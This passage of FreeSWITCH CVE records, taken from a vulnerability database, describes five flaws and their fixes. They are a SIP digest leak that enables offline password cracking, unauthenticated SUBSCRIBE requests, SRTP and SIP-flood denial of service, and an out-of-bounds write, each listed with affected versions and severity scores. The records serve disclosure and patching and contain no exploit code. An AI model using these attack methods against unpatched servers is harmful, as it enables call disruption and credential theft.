"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.10, FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID. When an SDP is offered with any ICE candidates with an unknown component ID, FreeSWITCH will make an out of bounds write to its arrays. By abusing this vulnerability, an attacker is able to corrupt FreeSWITCH memory leading to an undefined behavior of the system or a crash of it. Version 1.10.10 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787: Out-of-bounds Write",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-09-15T19:32:19.207Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-7mwp-86fv-hcg3"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.10"
}
],
"source": {
"advisory": "GHSA-7mwp-86fv-hcg3",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH allows remote users to trigger out of bounds write by offering an ICE candidate with unknown component ID"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-40018",
"datePublished": "2023-09-15T19:32:19.207Z",
"dateReserved": "2023-08-08T13:46:25.242Z",
"dateUpdated": "2024-09-25T18:02:59.227Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41158 (GCVE-0-2021-41158)
Vulnerability from cvelistv5 – Published: 2021-10-26 13:55 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH's SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH's network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges.
Severity ?
5.8 (Medium)
CWE
- CWE-200 - Exposure of Sensitive Information to an Unauthorized Actor
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.7
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.587Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"name": "20211026 [ES2021-05] FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH\u0027s SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH\u0027s network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-26T16:06:11",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"name": "20211026 [ES2021-05] FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
}
],
"source": {
"advisory": "GHSA-3v3f-99mv-qvj4",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41158",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH vulnerable to SIP digest leak for configured gateways"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.7"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, an attacker can perform a SIP digest leak attack against FreeSWITCH and receive the challenge response of a gateway configured on the FreeSWITCH server. This is done by challenging FreeSWITCH\u0027s SIP requests with the realm set to that of the gateway, thus forcing FreeSWITCH to respond with the challenge response which is based on the password of that targeted gateway. Abuse of this vulnerability allows attackers to potentially recover gateway passwords by performing a fast offline password cracking attack on the challenge response. The attacker does not require special network privileges, such as the ability to sniff the FreeSWITCH\u0027s network traffic, to exploit this issue. Instead, what is required for this attack to work is the ability to cause the victim server to send SIP request messages to the malicious party. Additionally, to exploit this issue, the attacker needs to specify the correct realm which might in some cases be considered secret. However, because many gateways are actually public, this information can easily be retrieved. The vulnerability appears to be due to the code which handles challenges in `sofia_reg.c`, `sofia_reg_handle_sip_r_challenge()` which does not check if the challenge is originating from the actual gateway. The lack of these checks allows arbitrary UACs (and gateways) to challenge any request sent by FreeSWITCH with the realm of the gateway being targeted. This issue is patched in version 10.10.7. Maintainers recommend that one should create an association between a SIP session for each gateway and its realm to make a check be put into place for this association when responding to challenges."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-3v3f-99mv-qvj4"
},
{
"name": "20211026 [ES2021-05] FreeSWITCH vulnerable to SIP digest leak for configured gateways",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Oct/40"
}
]
},
"source": {
"advisory": "GHSA-3v3f-99mv-qvj4",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41158",
"datePublished": "2021-10-26T13:55:10",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.587Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41157 (GCVE-0-2021-41157)
Vulnerability from cvelistv5 – Published: 2021-10-26 13:35 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
Severity ?
5.3 (Medium)
CWE
- CWE-287 - Improper Authentication
Assigner
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.6
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.697Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"name": "20211026 [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-287",
"description": "CWE-287: Improper Authentication",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-26T16:06:09",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"name": "20211026 [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
}
],
"source": {
"advisory": "GHSA-g7xg-7c54-rmpj",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41157",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.6"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-287: Improper Authentication"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-g7xg-7c54-rmpj"
},
{
"name": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"name": "20211026 [ES2021-08] FreeSWITCH does not authenticate SIP SUBSCRIBE requests by default",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Oct/41"
}
]
},
"source": {
"advisory": "GHSA-g7xg-7c54-rmpj",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41157",
"datePublished": "2021-10-26T13:35:10",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.697Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41105 (GCVE-0-2021-41105)
Vulnerability from cvelistv5 – Published: 2021-10-25 22:05 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller's or the callee's network. This issue is patched in version 1.10.7.
Severity ?
7.5 (High)
CWE
- CWE-20 - Improper Input Validation
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.7
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.548Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"name": "20211026 [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller\u0027s or the callee\u0027s network. This issue is patched in version 1.10.7."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-10-26T16:06:06",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"name": "20211026 [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
}
],
"source": {
"advisory": "GHSA-jh42-prph-gp36",
"discovery": "UNKNOWN"
},
"title": "FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2021-41105",
"STATE": "PUBLIC",
"TITLE": "FreeSWITCH susceptible to Denial of Service via invalid SRTP packets"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "freeswitch",
"version": {
"version_data": [
{
"version_value": "\u003c 1.10.7"
}
]
}
}
]
},
"vendor_name": "signalwire"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. When handling SRTP calls, FreeSWITCH prior to version 1.10.7 is susceptible to a DoS where calls can be terminated by remote attackers. This attack can be done continuously, thus denying encrypted calls during the attack. When a media port that is handling SRTP traffic is flooded with a specially crafted SRTP packet, the call is terminated leading to denial of service. This issue was reproduced when using the SDES key exchange mechanism in a SIP environment as well as when using the DTLS key exchange mechanism in a WebRTC environment. The call disconnection occurs due to line 6331 in the source file `switch_rtp.c`, which disconnects the call when the total number of SRTP errors reach a hard-coded threshold (100). By abusing this vulnerability, an attacker is able to disconnect any ongoing calls that are using SRTP. The attack does not require authentication or any special foothold in the caller\u0027s or the callee\u0027s network. This issue is patched in version 1.10.7."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-20: Improper Input Validation"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7",
"refsource": "MISC",
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36",
"refsource": "CONFIRM",
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jh42-prph-gp36"
},
{
"name": "20211026 [ES2021-09] FreeSWITCH susceptible to Denial of Service via invalid SRTP packets",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2021/Oct/43"
}
]
},
"source": {
"advisory": "GHSA-jh42-prph-gp36",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2021-41105",
"datePublished": "2021-10-25T22:05:16",
"dateReserved": "2021-09-15T00:00:00",
"dateUpdated": "2024-08-04T02:59:31.548Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-41145 (GCVE-0-2021-41145)
Vulnerability from cvelistv5 – Published: 2021-10-25 22:05 – Updated: 2024-08-04 02:59
VLAI?
Summary
FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7.
Severity ?
8.6 (High)
CWE
- CWE-400 - Uncontrolled Resource Consumption
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| signalwire | freeswitch |
Affected:
< 1.10.7
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:59:31.586Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "freeswitch",
"vendor": "signalwire",
"versions": [
{
"status": "affected",
"version": "\u003c 1.10.7"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. FreeSWITCH prior to version 1.10.7 is susceptible to Denial of Service via SIP flooding. When flooding FreeSWITCH with SIP messages, it was observed that after a number of seconds the process was killed by the operating system due to memory exhaustion. By abusing this vulnerability, an attacker is able to crash any FreeSWITCH instance by flooding it with SIP messages, leading to Denial of Service. The attack does not require authentication and can be carried out over UDP, TCP or TLS. This issue was patched in version 1.10.7."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-400",
"description": "CWE-400: Uncontrolled Resource Consumption",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-15T20:52:49",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-jvpq-23v4-gp3m"
}
],
"source": {
"advisory": "GHSA-jvpq-23v4-gp3m",
"discovery": "UNKNOWN"
},
